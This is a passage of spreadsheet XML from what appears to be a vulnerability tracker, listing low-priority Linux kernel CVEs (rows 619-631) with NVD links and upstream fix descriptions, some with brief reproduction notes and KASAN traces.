      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97979</t>
        </is>
      </c>
      <c r="D619" s="5" t="inlineStr"/>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="inlineStr"/>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr"/>
      <c r="S619" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ice: add missing xa_destroy for sched_node_ids
Commit 16dfa49406bc ("ice: Introduce new parameters in ice_sched_node")
added a sched_node_ids xarray to the port info structure, but never called
xa_destroy on it.
Since xarrays can allocate internal memory, this can result in a memory
leak even if every element in the xarray has been removed.
The xarray is currently embedded in the port_info structure. This appears
to have been done because its use is within functions that take the
port_info as a primary argument.
However, this complicates managing the lifecycle of the field. The
port_info structure is allocated in ice_init_hw() using devm, and it is
not released until the devm cleanup when the driver is unloaded.
The ice_init_hw() function is called in many places, including devlink
reload, and possibly during DDP load after updating the Tx scheduler
layout.
Adding a call of xa_destroy to the ice_deinit_hw() causes Sashiko to raise
multiple concerns due to potential ordering issues and possible ways that
port_info could be a dangling reference.
To handle this, move the sched_node_ids out of port_info and into the hw
structure. All users of the array already have a pointer to hw anyways, and
there is only one sched_node_ids per adapter. While here, remove the overly
verbose comment explaining the nature of the sched_node_ids xarray.
Add the missing xa_destroy to the cleanup path and to ice_deinit_hw(),
ensuring that we properly release the xarray memory.
This was caught by Sashiko during development of unrelated code.</t>
        </is>
      </c>
      <c r="T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97979</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97980</t>
        </is>
      </c>
      <c r="D620" s="5" t="inlineStr"/>
      <c r="E620" s="5" t="inlineStr"/>
      <c r="F620" s="5" t="inlineStr"/>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="inlineStr"/>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr"/>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr"/>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/debug: Fix NULL pointer dereference in debug_set_level()
Commit a2cec6863709 ("s390/debug: Add s390dbf kernel parameter")
incorrectly removed a null-id check from debug_set_level(), introducing
a possible NULL pointer dereference for debug-API users that put
debug_register() results unchecked into debug_set_level().
Fix this by moving the check from the internal _debug_set_level()
variant back to the external debug_set_level() wrapper.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97980</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97981</t>
        </is>
      </c>
      <c r="D621" s="5" t="inlineStr"/>
      <c r="E621" s="5" t="inlineStr"/>
      <c r="F621" s="5" t="inlineStr"/>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="inlineStr"/>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr"/>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr"/>
      <c r="S621" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: cortina: Count dropped frames as NAPI work
The RX loop only consumes budget when it successfully delivers a frame.
Error paths keep consuming descriptors without reducing the budget, so a
stream of bad frames can process the entire receive ring in one poll.
Move the budget accounting to a common end-of-frame path. This counts
each completed frame as NAPI work whether it was delivered or dropped,
matching the behavior of the vendor driver.</t>
        </is>
      </c>
      <c r="T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97981</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97982</t>
        </is>
      </c>
      <c r="D622" s="5" t="inlineStr"/>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="inlineStr"/>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="inlineStr"/>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr"/>
      <c r="S622" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: cortina: Fix budget accounting
The gmac_rx() function returns the remaining NAPI budget, but its
caller treats the return value as the number of packets received. An
idle poll therefore reports a full budget and remains scheduled.
Return the number of received packets instead. Preserve the existing
free queue refill accounting by adding that count directly; continuing
to subtract it from the budget would invert the refill behavior.</t>
        </is>
      </c>
      <c r="T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97982</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97983</t>
        </is>
      </c>
      <c r="D623" s="5" t="inlineStr"/>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="inlineStr"/>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="inlineStr"/>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr"/>
      <c r="S623" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vduse: return compat ioctl results directly
The compat handler handles VDUSE_IOTLB_GET_FD and VDUSE_VQ_GET_INFO, but
then calls the native handler. Their different command sizes make native
dispatch return -ENOIOCTLCMD.
For GET_FD, this overwrites receive_fd()'s return value after the
descriptor is installed, leaking one fd per call. Return handled compat
results directly and use native dispatch only for other commands.</t>
        </is>
      </c>
      <c r="T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97983</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97984</t>
        </is>
      </c>
      <c r="D624" s="5" t="inlineStr"/>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="inlineStr"/>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr"/>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: Fix UDP length overflow with PMTU discover and big MTU
This commit bounds cork-&gt;base.fragsize to IP6_MAX_MTU for UDP sockets to
avoid a possible overflow of UDP length that triggers a WARN in
udp_set_len_short when setsockopt IPV6_MTU_DISCOVER is set to
IPV6_PMTUDISC_DO or IPV6_PMTUDISC_PROBE, and a large packet is sent over
a netdev with an unusually large MTU.
Steps to reproduce (included in the new selftest):
1. Set device MTU bigger than IP6_MAX_MTU. cork-&gt;base.fragsize will be
   set to that MTU in ip6_setup_cork.
2. Set IPV6_MTU_DISCOVER to IPV6_PMTUDISC_PROBE or IPV6_PMTUDISC_DO. It
   lets maxnonfragsize be set to device MTU (cork-&gt;fragsize) in
   __ip6_append_data, rather than to IP6_MAX_MTU.
3. Send 65528 bytes of payload (+8 bytes of UDP header, +40 bytes of
   IPv6 header). Device MTU allows it (it's only one byte bigger than
   IP6_MAX_MTU, and the device MTU is bigger than that).
4. The UDP length in the built packet is 65536, which overflows the
   16-bit length field and triggers the WARN in udp_set_len_short.
To avoid breaking sending UDP jumbograms over raw IPv6 sockets, limit
the change to UDP sockets only.
The original overflow bug with IPv6 and IPV6_PMTUDISC_DO seems to
predate git history (verified reproduction on 2.6.21), was fixed later,
and then reappeared in commit 427faee167bc ("net: ipv6: introduce
ip6_dst_mtu_maybe_forward"), which is chosen as the Fixes tag here. The
overflow with IPV6_PMTUDISC_PROBE reproduces since its introduction in
commit 628a5c561890 ("[INET]: Add IP(V6)_PMTUDISC_RPOBE").</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97984</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97985</t>
        </is>
      </c>
      <c r="D625" s="5" t="inlineStr"/>
      <c r="E625" s="5" t="inlineStr"/>
      <c r="F625" s="5" t="inlineStr"/>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="inlineStr"/>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr"/>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr"/>
      <c r="S625" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
af_unix: Update last skb marker in manage_oob().
Fahad Alharbi reported that blocking recv(MSG_PEEK) could hog CPU
due to OOB skb.
In the following cases, manage_oob() skips OOB skb(s) and returns
NULL for the last recv(MSG_PEEK):
  socketpair(AF_UNIX, SOCK_STREAM, 0, sk);
  1) skb -&gt; OOB skb -&gt; NULL
     send(sk[0], "ab", 2, MSG_OOB);
     recv(sk[1], buf, 0, MSG_PEEK);
  2) skb -&gt; consumed OOB skb -&gt; NULL
     send(sk[0], "ab", 2, MSG_OOB);
     recv(sk[1], buf, 1, MSG_OOB);
     recv(sk[1], buf, 0, MSG_PEEK);
  3) consumed OOB skb -&gt; OOB skb -&gt; NULL
     send(sk[0], "a", 1, MSG_OOB);
     recv(sk[1], buf, 0, MSG_OOB);
     send(sk[0], "b", 1, MSG_OOB);
     recv(sk[1], buf, 1, MSG_PEEK);
Then, @copied is 0 in unix_stream_read_generic() (zero-length buffer,
or non-OOB skb is not yet consumed), and unix_stream_data_wait() is
called.
However, it returns immediately because @last is not updated in
unix_stream_read_generic(), and the thread busy-waits for a new skb.
Let's update @last in manage_oob().
For MSG_PEEK, @last is updated with the skipped OOB, and for the
non-peek case, @last matches the returned value (when !copied)
because OOB is unlinked.
Note that manage_oob() is inlined and no stack canary is added.</t>
        </is>
      </c>
      <c r="T625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97985</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97986</t>
        </is>
      </c>
      <c r="D626" s="5" t="inlineStr"/>
      <c r="E626" s="5" t="inlineStr"/>
      <c r="F626" s="5" t="inlineStr"/>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="inlineStr"/>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr"/>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr"/>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_input: stop callbacks before unregistering input device
virtinput_remove() unregisters the input device before resetting the
virtio device. virtinput_recv_events() drops vi-&gt;lock around input_event(),
so clearing vi-&gt;ready does not stop a callback that passed the entry check.
It can still use vi-&gt;idev, requeue buffers and kick the queue.
Reset first, as virtinput_freeze() already does. With the preceding core
change, reset waits for callbacks before input_unregister_device() can
free vi-&gt;idev. Recheck vi-&gt;ready after taking the lock again: keep draining
completed events so an input packet is not truncated, but stop requeueing
buffers and kicking the queue.
With evdev attached, input_unregister_handle() currently waits for an RCU
grace period, which also waits out IRQ callbacks. This masks the lifetime
bug on PCI and MMIO, but does not protect sleepable callbacks on other
transports.</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97986</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97987</t>
        </is>
      </c>
      <c r="D627" s="5" t="inlineStr"/>
      <c r="E627" s="5" t="inlineStr"/>
      <c r="F627" s="5" t="inlineStr"/>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="inlineStr"/>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr"/>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr"/>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_input: reset device if input_register_device() fails
Probe marks the device DRIVER_OK with virtio_device_ready() before
calling input_register_device(). If registration fails, the error path
cleared vi-&gt;ready and called del_vqs() while the device was still live,
so the device could keep DMA to queues that were already torn down.
Match remove/freeze: call virtio_reset_device() on that path before
tearing down the virtqueues.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97987</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97988</t>
        </is>
      </c>
      <c r="D628" s="5" t="inlineStr"/>
      <c r="E628" s="5" t="inlineStr"/>
      <c r="F628" s="5" t="inlineStr"/>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="inlineStr"/>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr"/>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr"/>
      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost: invalidate vring access on IOTLB transitions
When VIRTIO_F_ACCESS_PLATFORM changes, cached vring pointers and IOTLB
metadata are interpreted in a different address space. Keeping them
across the transition can leave stale ring mappings in use.
Clearing d-&gt;iotlb before taking the VQ locks also lets a worker observe
a transient NULL d-&gt;iotlb and fall back to d-&gt;umem while translating a
descriptor.
Add a common vhost_clear_device_iotlb() helper for vhost-net and
vhost-vsock. Take all VQ mutexes in index order before dropping the
device-wide IOTLB, invalidate each VQ's cached ring access and metadata,
clear pending IOTLB messages, and free the old table after the handoff.
This serializes the transition with workers and prevents mixed address
space mappings.
On the first direct-to-IOTLB transition, invalidate the cached vring
addresses. When an existing device IOTLB is replaced, preserve the
GIOVA ring addresses and reset only the metadata cache. After clearing
ACCESS_PLATFORM, userspace must configure the vring addresses for the
new address mode.
vhost_vq_invalidate_access() clears desc, avail, and used together.
Treat the VQ as invalidated only when all three are NULL, since a single
GIOVA address may legitimately be zero.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97988</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97989</t>
        </is>
      </c>
      <c r="D629" s="5" t="inlineStr"/>
      <c r="E629" s="5" t="inlineStr"/>
      <c r="F629" s="5" t="inlineStr"/>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="inlineStr"/>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr"/>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr"/>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vduse: validate virtqueue alignment
vduse_validate_config() only checks the upper bound of vq_align. Invalid
values can therefore reach vring_create_virtqueue_map(). The split-ring
helpers use align - 1 as a bit mask, so the alignment must be a non-zero
power of two. A zero value makes vring_size() drop the descriptor and
available-ring part and vring_init() leave the used ring pointer NULL.
The VIRTIO spec requires the used ring to start at an address
aligned to at least 4 bytes. Reject values below VRING_USED_ALIGN_SIZE as
well as non-power-of-two values before they reach the virtio ring helpers.
Opening a virtio-net device created with vq_align=0 triggered:
BUG: KASAN: null-ptr-deref in virtqueue_kick_prepare_split+0xe3/0x100
Read of size 2 at addr 0000000000000000 by task systemd-network/1062
Call Trace (relevant frames):
 dump_stack_lvl
 print_report
 kasan_report
 __asan_load2
 virtqueue_kick_prepare_split+0xe3/0x100
 virtqueue_kick_prepare+0x40/0x60
 try_fill_recv+0x857/0x1250
 virtnet_open+0x189/0x460
 __dev_open+0x225/0x390
 __dev_change_flags+0x368/0x3b0
 netif_change_flags+0x56/0xc0
 do_setlink.isra.0+0x68c/0x1e30
Validate the value before it reaches the virtio ring helpers.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97989</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97992</t>
        </is>
      </c>
      <c r="D630" s="5" t="inlineStr"/>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="inlineStr"/>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr"/>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost-vdpa: protect config_ctx from being freed under the config callback
vhost_vdpa_config_cb() loads v-&gt;config_ctx and signals it without taking
a reference and without holding any lock:
	struct eventfd_ctx *config_ctx = v-&gt;config_ctx;
	if (config_ctx)
		eventfd_signal(config_ctx);
VHOST_VDPA_SET_CONFIG_CALL replaces that field and drops what is normally
the last reference to the old context:
	swap(ctx, v-&gt;config_ctx);
	if (ctx)
		eventfd_ctx_put(ctx);
eventfd_ctx_put() drops the last kref and frees the context immediately,
with no RCU grace period, so a callback that has already loaded the
pointer goes on to dereference freed memory.  The two sides share no
lock: the ioctl runs under vhost_dev.mutex, while the parent invokes the
callback from its own interrupt or workqueue context.
This is not the reopen refcount underflow fixed by commit f6bbf0010ba0
("vhost-vdpa: fix use-after-free of v-&gt;config_ctx"), which was about
vhost_vdpa_config_put() leaving a stale pointer behind.  Here the pointer
is maintained correctly and it is the read side that is unprotected.
With VDUSE as the parent this is reachable from userspace with access to
/dev/vduse (root by default).  VDUSE_DEV_INJECT_CONFIG_IRQ queues
dev-&gt;inject, and vduse_dev_irq_inject() runs the callback under VDUSE's
own dev-&gt;irq_lock, which vhost does not hold.  vduse_dev_reset() does
flush_work(&amp;dev-&gt;inject), but VHOST_VDPA_SET_CONFIG_CALL never goes
through reset, so an inject already in flight is not waited for.  A
process that injects config interrupts on the VDUSE fd while another
thread swaps the call fd on the vhost-vdpa fd hits it in seconds:
  BUG: KASAN: slab-use-after-free in native_queued_spin_lock_slowpath
  Read of size 4 at addr ffff888107d21808 by task kworker/u17:1/2993
  Workqueue: vduse-irq vduse_dev_irq_inject
  Call Trace:
   native_queued_spin_lock_slowpath+0x97/0x5b0
   _raw_spin_lock_irqsave+0xd4/0xe0
   eventfd_signal_mask+0x69/0x120
   vhost_vdpa_config_cb+0x34/0x50
   vduse_dev_irq_inject+0x46/0x60
   process_one_work+0x468/0x950
  Allocated by task 2992:
   do_eventfd+0x50/0x200
   __x64_sys_eventfd2+0x2e/0x40
  Freed by task 2992:
   eventfd_ctx_put+0xb9/0xc0
   vhost_vdpa_unlocked_ioctl+0x116c/0x2190
Add a spinlock covering every access to config_ctx, so the callback
either signals a context that is still alive or observes NULL, and the
put happens only once no callback can reach the old value.
Clearing the parent's callback before the put would not be enough: of the
in-tree set_config_cb() implementations only VDUSE takes a lock, the rest
store the pointer unlocked, so that would not order against an in-flight
invocation.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97992</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97993</t>
        </is>
      </c>
      <c r="D631" s="5" t="inlineStr"/>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="inlineStr"/>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr"/>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost-vdpa: don't install the eventfd_ctx_fdget() error in config_ctx
vhost_vdpa_set_config_call() swaps the eventfd_ctx_fdget() return value
into v-&gt;config_ctx before checking it, so on failure the field briefly
holds an ERR_PTR:
	ctx = fd == VHOST_FILE_UNBIND ? NULL : eventfd_ctx_fdget(fd);
	swap(ctx, v-&gt;config_ctx);
	if (!IS_ERR_OR_NULL(ctx))
		eventfd_ctx_put(ctx);
	if (IS_ERR(v-&gt;config_ctx)) {
		long ret = PTR_ERR(v-&gt;config_ctx);
		v-&gt;config_ctx = NULL;
		return ret;
	}
Commit 0bde59c1723a ("vhost-vdpa: set v-&gt;config_ctx to NULL if
